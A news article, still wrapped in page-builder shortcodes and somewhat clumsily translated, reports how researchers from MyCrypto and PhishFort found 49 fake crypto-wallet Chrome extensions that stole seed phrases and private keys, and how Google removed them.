49 Chrome malware plugins got caught stealing from purchases

[vc_row][vc_column][vc_paragraph text=”Google threw out 49 plugins from its online store on Chrome browser. They were posing as crypto wallets.“][/vc_column][/vc_row][vc_row][vc_column][vc_heading title=”Official status does not guarantee reliability” size=”medium”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”The plugins were detected by researchers from MyCrypto – an interface with open blockchain code, and PhishFort that sells anti-phishing protection.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”Harry Danley, MyCrypto Director of Security, announced that malware plugins are not new. They are intended for Ledger crypto wallets (57% of the plugins were developed for these wallets), Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus и KeepKey.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”The plugins are essentially the “secret phishing” and include users’ mnemonic phrases, personal keys and key storage files that represent security documents used for developers identification or SSL encryption.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”Once the user inserts confidential data, an HTTP-request is sent to POST backend. This is where perpetrators get all the secret data and use it to withdraw money from the wallets.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”MyCrypt has identified 14 unique command and control servers (C2) that got data from hacked systems.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”After analyzing the servers the researchers found out that some of them were connected. This means they were being run by one hacking group.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”While some of them converted data to GoogleDocs form, the rest were uploading backends with PHP user scripts.”][/vc_column][/vc_row][vc_row][vc_column][vc_heading title=”Hackers that created false plugins are probably from Russia” size=”medium”][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=”1015″ img_size=”full”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”Most of the domains are new: 80% of them were registered in March or April.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”The first domain – ledger.productions is wired to other servers. This gives the researchers the idea of backend-set, and of the hackers themselves that carry out operations for most of the plugins.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”One of the servers even gave some clues: thus, it is clear that hacking actions were likely being controlled from Russia, especially considering the fact that administrator’s email ends with “r.ru”.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”The process imitates the standard MyEtherWallet operating unless users enter their secret data.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”The malware App sends the data back to C2s, and then direct users back to default settings.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”This results in users disappointment and provides malware programs with new secret information. After that users usually delete the plugin and forget about it unless their wallets are robbed.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”This happens only when the plugin is deleted. Thus, users have no idea how their money could be stolen.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”Some of the plugins were evaluated by false reviewers who gave out fake excellent reviews. They were rather short and amateurish, like “good”, “useful app” or “legal”.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”MyEtherWallet used one and the same “copy”, and the same review was published about 8 times and by different users.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”All of the reviews gave information on what is BTC and explained why MyEtherWallet was preferable for browser using.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”The researchers send funds to several addresses and transferred secret data to malware plugins. Still these data were not viewed probably because the hackers were interested in high-value accounts, or maybe they scan the accounts manually.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”Although the experts hadn’t revealed the confidential data for malware software, many users published that they had lost investments on support forums like Chrome, Reddit и Toshi Times.”][/vc_column][/vc_row][vc_row][vc_column][vc_paragraph text=”In a result, Google threw out the plugins from the Chrome online store within 24 hours after the heads-up.”][/vc_column][/vc_row]